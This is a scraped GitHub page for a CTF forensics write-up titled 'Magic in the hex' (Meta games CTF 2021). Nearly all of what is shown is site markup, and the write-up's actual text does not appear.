<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
</div> </label></form> </div></div>
</div>
<div class="position-relative mr-lg-3 d-lg-inline-block"> Sign in </div>
Sign up </div> </div> </div> </div></header>
</div>
<div id="start-of-content" class="show-on-focus"></div>
<div id="js-flash-container" data-turbo-replace>
<template class="js-flash-template"> <div class="flash flash-full {{ className }}"> <div class="px-2" > <button autofocus class="flash-close js-flash-close" type="button" aria-label="Dismiss this message"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg> </button> <div aria-atomic="true" role="alert" class="js-flash-alert"> <div>{{ message }}</div>
</div> </div></div> </template></div>
<include-fragment class="js-notification-shelf-include-fragment" data-base-src="https://github.com/notifications/beta/shelf"></include-fragment>
<div class="application-main " data-commit-hovercards-enabled data-discussion-hovercards-enabled data-issue-and-pr-hovercards-enabled > <div itemscope itemtype="http://schema.org/SoftwareSourceCode" class=""> <main id="js-repo-pjax-container" >
<div id="repository-container-header" class="pt-3 hide-full-screen" style="background-color: var(--color-page-header-bg);" data-turbo-replace>
<div class="d-flex flex-wrap flex-justify-end mb-3 px-3 px-md-4 px-lg-5" style="gap: 1rem;">
<div class="flex-auto min-width-0 width-fit mr-3"> <div class=" d-flex flex-wrap flex-items-center wb-break-word f3 text-normal"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo color-fg-muted mr-2"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <span> palanioffcl </span> <span>/</span> CTF-Writeups
<span></span><span>Public</span> </div>
</div>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-bell mr-2"> <path d="M8 16a2 2 0 0 0 1.985-1.75c.017-.137-.097-.25-.235-.25h-3.5c-.138 0-.252.113-.235.25A2 2 0 0 0 8 16ZM3 5a5 5 0 0 1 10 0v2.947c0 .05.015.098.042.139l1.703 2.555A1.519 1.519 0 0 1 13.482 13H2.518a1.516 1.516 0 0 1-1.263-2.36l1.703-2.554A.255.255 0 0 0 3 7.947Zm5-3.5A3.5 3.5 0 0 0 4.5 5v2.947c0 .346-.102.683-.294.97l-1.703 2.556a.017.017 0 0 0-.003.01l.001.006c0 .002.002.004.004.006l.006.004.007.001h10.964l.007-.001.006-.004.004-.006.001-.007a.017.017 0 0 0-.003-.01l-1.703-2.554a1.745 1.745 0 0 1-.294-.97V5A3.5 3.5 0 0 0 8 1.5Z"></path></svg>Notifications
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo-forked mr-2"> <path d="M5 5.372v.878c0 .414.336.75.75.75h4.5a.75.75 0 0 0 .75-.75v-.878a2.25 2.25 0 1 1 1.5 0v.878a2.25 2.25 0 0 1-2.25 2.25h-1.5v2.128a2.251 2.251 0 1 1-1.5 0V8.5h-1.5A2.25 2.25 0 0 1 3.5 6.25v-.878a2.25 2.25 0 1 1 1.5 0ZM5 3.25a.75.75 0 1 0-1.5 0 .75.75 0 0 0 1.5 0Zm6.75.75a.75.75 0 1 0 0-1.5.75.75 0 0 0 0 1.5Zm-3 8.75a.75.75 0 1 0-1.5 0 .75.75 0 0 0 1.5 0Z"></path></svg>Fork <span>0</span>
<div data-view-component="true" class="BtnGroup d-flex"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-star v-align-text-bottom d-inline-block mr-2"> <path d="M8 .25a.75.75 0 0 1 .673.418l1.882 3.815 4.21.612a.75.75 0 0 1 .416 1.279l-3.046 2.97.719 4.192a.751.751 0 0 1-1.088.791L8 12.347l-3.766 1.98a.75.75 0 0 1-1.088-.79l.72-4.194L.818 6.374a.75.75 0 0 1 .416-1.28l4.21-.611L7.327.668A.75.75 0 0 1 8 .25Zm0 2.445L6.615 5.5a.75.75 0 0 1-.564.41l-3.097.45 2.24 2.184a.75.75 0 0 1 .216.664l-.528 3.084 2.769-1.456a.75.75 0 0 1 .698 0l2.77 1.456-.53-3.084a.75.75 0 0 1 .216-.664l2.24-2.183-3.096-.45a.75.75 0 0 1-.564-.41L8 2.694Z"></path></svg><span> Star</span> <span>0</span> <button disabled="disabled" aria-label="You must be signed in to add this repository to a list" type="button" data-view-component="true" class="btn-sm btn BtnGroup-item px-2"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg></button></div>
</div>
<div id="responsive-meta-container" data-turbo-replace></div>
<nav data-pjax="#js-repo-pjax-container" aria-label="Repository" data-view-component="true" class="js-repo-nav js-sidenav-container-pjax js-responsive-underlinenav overflow-hidden UnderlineNav px-3 px-md-4 px-lg-5">
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-code UnderlineNav-octicon d-none d-sm-inline"> <path d="m11.28 3.22 4.25 4.25a.75.75 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.275-.326.749.749 0 0 1 .215-.734L13.94 8l-3.72-3.72a.749.749 0 0 1 .326-1.275.749.749 0 0 1 .734.215Zm-6.56 0a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042L2.06 8l3.72 3.72a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L.47 8.53a.75.75 0 0 1 0-1.06Z"></path></svg> <span>Code</span> <span></span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-issue-opened UnderlineNav-octicon d-none d-sm-inline"> <path d="M8 9.5a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Z"></path><path d="M8 0a8 8 0 1 1 0 16A8 8 0 0 1 8 0ZM1.5 8a6.5 6.5 0 1 0 13 0 6.5 6.5 0 0 0-13 0Z"></path></svg> <span>Issues</span> <span>0</span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-git-pull-request UnderlineNav-octicon d-none d-sm-inline"> <path d="M1.5 3.25a2.25 2.25 0 1 1 3 2.122v5.256a2.251 2.251 0 1 1-1.5 0V5.372A2.25 2.25 0 0 1 1.5 3.25Zm5.677-.177L9.573.677A.25.25 0 0 1 10 .854V2.5h1A2.5 2.5 0 0 1 13.5 5v5.628a2.251 2.251 0 1 1-1.5 0V5a1 1 0 0 0-1-1h-1v1.646a.25.25 0 0 1-.427.177L7.177 3.427a.25.25 0 0 1 0-.354ZM3.75 2.5a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Zm0 9.5a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Zm8.25.75a.75.75 0 1 0 1.5 0 .75.75 0 0 0-1.5 0Z"></path></svg> <span>Pull requests</span> <span>0</span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-play UnderlineNav-octicon d-none d-sm-inline"> <path d="M8 0a8 8 0 1 1 0 16A8 8 0 0 1 8 0ZM1.5 8a6.5 6.5 0 1 0 13 0 6.5 6.5 0 0 0-13 0Zm4.879-2.773 4.264 2.559a.25.25 0 0 1 0 .428l-4.264 2.559A.25.25 0 0 1 6 10.559V5.442a.25.25 0 0 1 .379-.215Z"></path></svg> <span>Actions</span> <span></span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-table UnderlineNav-octicon d-none d-sm-inline"> <path d="M0 1.75C0 .784.784 0 1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25ZM6.5 6.5v8h7.75a.25.25 0 0 0 .25-.25V6.5Zm8-1.5V1.75a.25.25 0 0 0-.25-.25H6.5V5Zm-13 1.5v7.75c0 .138.112.25.25.25H5v-8ZM5 5V1.5H1.75a.25.25 0 0 0-.25.25V5Z"></path></svg> <span>Projects</span> <span>0</span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-shield UnderlineNav-octicon d-none d-sm-inline"> <path d="M7.467.133a1.748 1.748 0 0 1 1.066 0l5.25 1.68A1.75 1.75 0 0 1 15 3.48V7c0 1.566-.32 3.182-1.303 4.682-.983 1.498-2.585 2.813-5.032 3.855a1.697 1.697 0 0 1-1.33 0c-2.447-1.042-4.049-2.357-5.032-3.855C1.32 10.182 1 8.566 1 7V3.48a1.75 1.75 0 0 1 1.217-1.667Zm.61 1.429a.25.25 0 0 0-.153 0l-5.25 1.68a.25.25 0 0 0-.174.238V7c0 1.358.275 2.666 1.057 3.86.784 1.194 2.121 2.34 4.366 3.297a.196.196 0 0 0 .154 0c2.245-.956 3.582-2.104 4.366-3.298C13.225 9.666 13.5 8.36 13.5 7V3.48a.251.251 0 0 0-.174-.237l-5.25-1.68ZM8.75 4.75v3a.75.75 0 0 1-1.5 0v-3a.75.75 0 0 1 1.5 0ZM9 10.5a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> <span>Security</span> <include-fragment src="/palanioffcl/CTF-Writeups/security/overall-count" accept="text/fragment+html"></include-fragment>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-graph UnderlineNav-octicon d-none d-sm-inline"> <path d="M1.5 1.75V13.5h13.75a.75.75 0 0 1 0 1.5H.75a.75.75 0 0 1-.75-.75V1.75a.75.75 0 0 1 1.5 0Zm14.28 2.53-5.25 5.25a.75.75 0 0 1-1.06 0L7 7.06 4.28 9.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.25-3.25a.75.75 0 0 1 1.06 0L10 7.94l4.72-4.72a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042Z"></path></svg> <span>Insights</span> <span></span>
<div style="visibility:hidden;" data-view-component="true" class="UnderlineNav-actions js-responsive-underlinenav-overflow position-absolute pr-3 pr-md-4 pr-lg-5 right-0"> <details data-view-component="true" class="details-overlay details-reset position-relative"> <summary role="button" data-view-component="true"> <div class="UnderlineNav-item mr-0 border-0"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-kebab-horizontal"> <path d="M8 9a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3ZM1.5 9a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Zm13 0a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Z"></path></svg> <span>More</span> </div></summary> <details-menu role="menu" data-view-component="true" class="dropdown-menu dropdown-menu-sw"> Code Issues Pull requests Actions Projects Security Insights </details-menu></details></div></nav>
</div>
<turbo-frame id="repo-content-turbo-frame" target="_top" data-turbo-action="advance" class=""> <div id="repo-content-pjax-container" class="repository-content " >
<div class="clearfix container-xl px-3 px-md-4 px-lg-5 mt-4"> <div >
Permalink
<div class="d-flex flex-items-start flex-shrink-0 pb-3 flex-wrap flex-md-nowrap flex-justify-between flex-md-justify-start"> <div class="position-relative"> <details class="js-branch-select-menu details-reset details-overlay mr-0 mb-0 " id="branch-select-menu" data-hydro-click-payload="{"event_type":"repository.click","payload":{"target":"REFS_SELECTOR_MENU","repository_id":426049755,"originating_url":"https://github.com/palanioffcl/CTF-Writeups/blob/3dfbfc9f6d536f6f42758da711d280dfe61cf9d2/Meta%20games%20CTF%202021/Forensics/Magic%20in%20the%20hex.md","user_id":null}}" data-hydro-click-hmac="64e302a4cf9c91c3c6f5355e72db816bb9c9b32555b91f678d78e1cd589ee24e"> <summary class="btn css-truncate" data-hotkey="w" title="Switch branches or tags"> <svg text="gray" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-git-branch"> <path d="M9.5 3.25a2.25 2.25 0 1 1 3 2.122V6A2.5 2.5 0 0 1 10 8.5H6a1 1 0 0 0-1 1v1.128a2.251 2.251 0 1 1-1.5 0V5.372a2.25 2.25 0 1 1 1.5 0v1.836A2.493 2.493 0 0 1 6 7h4a1 1 0 0 0 1-1v-.628A2.25 2.25 0 0 1 9.5 3.25Zm-6 0a.75.75 0 1 0 1.5 0 .75.75 0 0 0-1.5 0Zm8.25-.75a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5ZM4.25 12a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Z"></path></svg> <span>3dfbfc9f6d</span> <span></span> </summary>
<div class="SelectMenu"> <div class="SelectMenu-modal"> <header class="SelectMenu-header"> <span>Switch branches/tags</span> <button class="SelectMenu-closeButton" type="button" data-toggle-for="branch-select-menu"><svg aria-label="Close menu" aria-hidden="false" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg></button> </header>
<input-demux data-action="tab-container-change:input-demux#storeInput tab-container-changed:input-demux#updateInput"> <tab-container class="d-flex flex-column js-branches-tags-tabs" style="min-height: 0;"> <div class="SelectMenu-filter"> <input data-target="input-demux.source" id="context-commitish-filter-field" class="SelectMenu-input form-control" aria-owns="ref-list-branches" data-controls-ref-menu-id="ref-list-branches" autofocus autocomplete="off" aria-label="Filter branches/tags" placeholder="Filter branches/tags" type="text" > </div>
<div class="SelectMenu-tabs" role="tablist" data-target="input-demux.control" > <button class="SelectMenu-tab" type="button" role="tab" aria-selected="true">Branches</button> <button class="SelectMenu-tab" type="button" role="tab">Tags</button> </div>
<div role="tabpanel" id="ref-list-branches" data-filter-placeholder="Filter branches/tags" tabindex="" class="d-flex flex-column flex-auto overflow-auto"> <ref-selector type="branch" data-targets="input-demux.sinks" data-action=" input-entered:ref-selector#inputEntered tab-selected:ref-selector#tabSelected focus-list:ref-selector#focusFirstListMember " query-endpoint="/palanioffcl/CTF-Writeups/refs" cache-key="v0:1639277858.428184" current-committish="M2RmYmZjOWY2ZDUzNmY2ZjQyNzU4ZGE3MTFkMjgwZGZlNjFjZjlkMg==" default-branch="bWFpbg==" name-with-owner="cGFsYW5pb2ZmY2wvQ1RGLVdyaXRldXBz" prefetch-on-mouseover >
<template data-target="ref-selector.fetchFailedTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Could not load branches</div> </template>
<template data-target="ref-selector.noMatchTemplate"> <div class="SelectMenu-message">Nothing to show</div></template>
<div data-target="ref-selector.listContainer" role="menu" class="SelectMenu-list " data-turbo-frame="repo-content-turbo-frame"> <div class="SelectMenu-loading pt-3 pb-0 overflow-hidden" aria-label="Menu is loading"> <svg style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> </div> </div>
<template data-target="ref-selector.itemTemplate"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check SelectMenu-icon SelectMenu-icon--check"> <path d="M13.78 4.22a.75.75 0 0 1 0 1.06l-7.25 7.25a.75.75 0 0 1-1.06 0L2.22 9.28a.751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018L6 10.94l6.72-6.72a.75.75 0 0 1 1.06 0Z"></path></svg> <span>{{ refName }}</span> <span>default</span> </template>
<footer class="SelectMenu-footer">View all branches</footer> </ref-selector>
</div>
<div role="tabpanel" id="tags-menu" data-filter-placeholder="Find a tag" tabindex="" hidden class="d-flex flex-column flex-auto overflow-auto"> <ref-selector type="tag" data-action=" input-entered:ref-selector#inputEntered tab-selected:ref-selector#tabSelected focus-list:ref-selector#focusFirstListMember " data-targets="input-demux.sinks" query-endpoint="/palanioffcl/CTF-Writeups/refs" cache-key="v0:1639277858.428184" current-committish="M2RmYmZjOWY2ZDUzNmY2ZjQyNzU4ZGE3MTFkMjgwZGZlNjFjZjlkMg==" default-branch="bWFpbg==" name-with-owner="cGFsYW5pb2ZmY2wvQ1RGLVdyaXRldXBz" >
<template data-target="ref-selector.fetchFailedTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Could not load tags</div> </template>
<template data-target="ref-selector.noMatchTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Nothing to show</div> </template>
<template data-target="ref-selector.itemTemplate"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check SelectMenu-icon SelectMenu-icon--check"> <path d="M13.78 4.22a.75.75 0 0 1 0 1.06l-7.25 7.25a.75.75 0 0 1-1.06 0L2.22 9.28a.751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018L6 10.94l6.72-6.72a.75.75 0 0 1 1.06 0Z"></path></svg> <span>{{ refName }}</span> <span>default</span> </template>
<div data-target="ref-selector.listContainer" role="menu" class="SelectMenu-list" data-turbo-frame="repo-content-turbo-frame"> <div class="SelectMenu-loading pt-3 pb-0 overflow-hidden" aria-label="Menu is loading"> <svg style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> </div> </div> <footer class="SelectMenu-footer">View all tags</footer> </ref-selector> </div> </tab-container> </input-demux> </div></div>
</details>
</div>
<div class="Overlay--hidden Overlay-backdrop--center" data-modal-dialog-overlay> <modal-dialog role="dialog" id="warn-tag-match-create-branch-dialog" aria-modal="true" aria-labelledby="warn-tag-match-create-branch-dialog-header" data-view-component="true" class="Overlay Overlay--width-large Overlay--height-auto Overlay--motion-scaleFade"> <header class="Overlay-header Overlay-header--large Overlay-header--divided"> <div class="Overlay-headerContentWrap"> <div class="Overlay-titleWrap"> <h1 id="warn-tag-match-create-branch-dialog-header" class="Overlay-title">Name already in use</h1> </div> <div class="Overlay-actionWrap"> <button data-close-dialog-id="warn-tag-match-create-branch-dialog" aria-label="Close" type="button" data-view-component="true" class="close-button Overlay-closeButton"><svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg></button> </div> </div> </header> <div class="Overlay-body "> <div data-view-component="true"> A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?</div>
</div> <footer class="Overlay-footer Overlay-footer--alignEnd"> <button data-close-dialog-id="warn-tag-match-create-branch-dialog" type="button" data-view-component="true" class="btn"> Cancel</button> <button data-submit-dialog-id="warn-tag-match-create-branch-dialog" type="button" data-view-component="true" class="btn-danger btn"> Create</button> </footer></modal-dialog></div>
<h2 id="blob-path" class="breadcrumb flex-auto flex-self-center min-width-0 text-normal mx-2 width-full width-md-auto flex-order-1 flex-md-order-none mt-3 mt-md-0"> <span><span><span>CTF-Writeups</span></span></span><span>/</span><span><span>Meta games CTF 2021</span></span><span>/</span><span><span>Forensics</span></span><span>/</span>Magic in the hex.md </h2> Go to file <details id="blob-more-options-details" data-view-component="true" class="details-overlay details-reset position-relative"> <summary role="button" data-view-component="true" class="btn"> <svg aria-label="More options" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-kebab-horizontal"> <path d="M8 9a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3ZM1.5 9a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Zm13 0a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Z"></path></svg></summary> <div data-view-component="true"> <span>Go to file</span> <span>T</span> <button data-toggle-for="jumpto-line-details-dialog" type="button" data-view-component="true" class="dropdown-item btn-link"> <span> <span>Go to line</span> <span>L</span> </span></button> <clipboard-copy data-toggle-for="blob-more-options-details" aria-label="Copy path" value="Meta games CTF 2021/Forensics/Magic in the hex.md" data-view-component="true" class="dropdown-item cursor-pointer"> Copy path
</clipboard-copy> <clipboard-copy data-toggle-for="blob-more-options-details" aria-label="Copy permalink" value="https://github.com/palanioffcl/CTF-Writeups/blob/3dfbfc9f6d536f6f42758da711d280dfe61cf9d2/Meta%20games%20CTF%202021/Forensics/Magic%20in%20the%20hex.md" data-view-component="true" class="dropdown-item cursor-pointer"> <span> <span>Copy permalink</span> </span>
</clipboard-copy> </div></details></div>
<div id="spoof-warning" class="mt-0 pb-3" hidden aria-hidden> <div data-view-component="true" class="flash flash-warn mt-0 clearfix"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert float-left mt-1"> <path d="M6.457 1.047c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0 1 14.082 15H1.918a1.75 1.75 0 0 1-1.543-2.575Zm1.763.707a.25.25 0 0 0-.44 0L1.698 13.132a.25.25 0 0 0 .22.368h12.164a.25.25 0 0 0 .22-.368Zm.53 3.996v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 1.5 0ZM9 11a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg>
<div class="overflow-hidden">This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.</div>
</div></div>
<include-fragment src="/palanioffcl/CTF-Writeups/spoofed_commit_check/3dfbfc9f6d536f6f42758da711d280dfe61cf9d2" data-test-selector="spoofed-commit-check"></include-fragment>
<div class="Box d-flex flex-column flex-shrink-0 mb-3"> <include-fragment src="/palanioffcl/CTF-Writeups/contributors/3dfbfc9f6d536f6f42758da711d280dfe61cf9d2/Meta%20games%20CTF%202021/Forensics/Magic%20in%20the%20hex.md" class="commit-loader"> <div class="Box-header d-flex flex-items-center"> <div class="Skeleton avatar avatar-user flex-shrink-0 ml-n1 mr-n1 mt-n1 mb-n1" style="width:24px;height:24px;"></div> <div class="Skeleton Skeleton--text col-5 ml-2"> </div> </div>
<div class="Box-body d-flex flex-items-center" > <div class="Skeleton Skeleton--text col-1"> </div> <span>Cannot retrieve contributors at this time</span> </div></include-fragment></div>
<readme-toc>
<div data-target="readme-toc.content" class="Box mt-3 position-relative"> <div class="Box-header js-blob-header blob-header js-sticky js-position-sticky top-0 p-2 d-flex flex-shrink-0 flex-md-row flex-items-center" style="position: sticky; z-index: 1;" >
<details data-target="readme-toc.trigger" data-menu-hydro-click="{"event_type":"repository_toc_menu.click","payload":{"target":"trigger","repository_id":426049755,"originating_url":"https://github.com/palanioffcl/CTF-Writeups/blob/3dfbfc9f6d536f6f42758da711d280dfe61cf9d2/Meta%20games%20CTF%202021/Forensics/Magic%20in%20the%20hex.md","user_id":null}}" data-menu-hydro-click-hmac="ac8f9bc5388913fc83ab6dd25c8b68f42d8ac9f81ade1493b91f3fbc94d7d3eb" class="dropdown details-reset details-overlay"> <summary class="btn btn-octicon m-0 mr-2 p-2" aria-haspopup="true" aria-label="Table of Contents"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-list-unordered"> <path d="M5.75 2.5h8.5a.75.75 0 0 1 0 1.5h-8.5a.75.75 0 0 1 0-1.5Zm0 5h8.5a.75.75 0 0 1 0 1.5h-8.5a.75.75 0 0 1 0-1.5Zm0 5h8.5a.75.75 0 0 1 0 1.5h-8.5a.75.75 0 0 1 0-1.5ZM2 14a1 1 0 1 1 0-2 1 1 0 0 1 0 2Zm1-6a1 1 0 1 1-2 0 1 1 0 0 1 2 0ZM2 4a1 1 0 1 1 0-2 1 1 0 0 1 0 2Z"></path></svg> </summary>
<details-menu class="SelectMenu" role="menu"> <div class="SelectMenu-modal rounded-3 mt-1" style="max-height:340px;">
<div class="SelectMenu-list SelectMenu-list--borderless p-2" style="overscroll-behavior: contain;"> Magic in the hex Challenge (100pts) Description: Procedure: Flag: </div> </div> </details-menu></details>
<div class="text-mono f6 flex-auto pr-3 flex-order-2 flex-md-order-1">
14 lines (8 sloc) <span></span> 720 Bytes </div>
<div class="d-flex py-1 py-md-0 flex-auto flex-order-1 flex-md-order-2 flex-sm-grow-0 flex-justify-between hide-sm hide-md"> <div class="BtnGroup"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-code"> <path d="m11.28 3.22 4.25 4.25a.75.75 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.275-.326.749.749 0 0 1 .215-.734L13.94 8l-3.72-3.72a.749.749 0 0 1 .326-1.275.749.749 0 0 1 .734.215Zm-6.56 0a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042L2.06 8l3.72 3.72a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L.47 8.53a.75.75 0 0 1 0-1.06Z"></path></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-file"> <path d="M2 1.75C2 .784 2.784 0 3.75 0h6.586c.464 0 .909.184 1.237.513l2.914 2.914c.329.328.513.773.513 1.237v9.586A1.75 1.75 0 0 1 13.25 16h-9.5A1.75 1.75 0 0 1 2 14.25Zm1.75-.25a.25.25 0 0 0-.25.25v12.5c0 .138.112.25.25.25h9.5a.25.25 0 0 0 .25-.25V6h-2.75A1.75 1.75 0 0 1 9 4.25V1.5Zm6.75.062V4.25c0 .138.112.25.25.25h2.688l-.011-.013-2.914-2.914-.013-.011Z"></path></svg> </div>
<div class="BtnGroup"> Raw Blame </div>
<div class="d-flex"> <div class="ml-1" > </option></form><form class="BtnGroup-parent js-update-url-with-hash " data-turbo="false" action="/palanioffcl/CTF-Writeups/edit/3dfbfc9f6d536f6f42758da711d280dfe61cf9d2/Meta%20games%20CTF%202021/Forensics/Magic%20in%20the%20hex.md" accept-charset="UTF-8" method="post"><input type="hidden" name="authenticity_token" value="J3hBxvtmzWMjz5tvB9sLD_4dPuZWS7A2AowJlYES1-UuSOzyY9wCYvhAGeeiV0JgVucnmuGV49E7NTseC6t6QA" autocomplete="off" /> <button disabled="disabled" title="You must be signed in to make or propose changes" data-hotkey="e" data-disable-with="" type="submit" data-view-component="true" class="btn-sm BtnGroup-item btn"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-pencil"> <path d="M11.013 1.427a1.75 1.75 0 0 1 2.474 0l1.086 1.086a1.75 1.75 0 0 1 0 2.474l-8.61 8.61c-.21.21-.47.364-.756.445l-3.251.93a.75.75 0 0 1-.927-.928l.929-3.25c.081-.286.235-.547.445-.758l8.61-8.61Zm.176 4.823L9.75 4.81l-6.286 6.287a.253.253 0 0 0-.064.108l-.558 1.953 1.953-.558a.253.253 0 0 0 .108-.064Zm1.238-3.763a.25.25 0 0 0-.354 0L10.811 3.75l1.439 1.44 1.263-1.263a.25.25 0 0 0 0-.354Z"></path></svg></button></form> <details class="details-reset details-overlay select-menu BtnGroup-parent d-inline-block position-relative"> 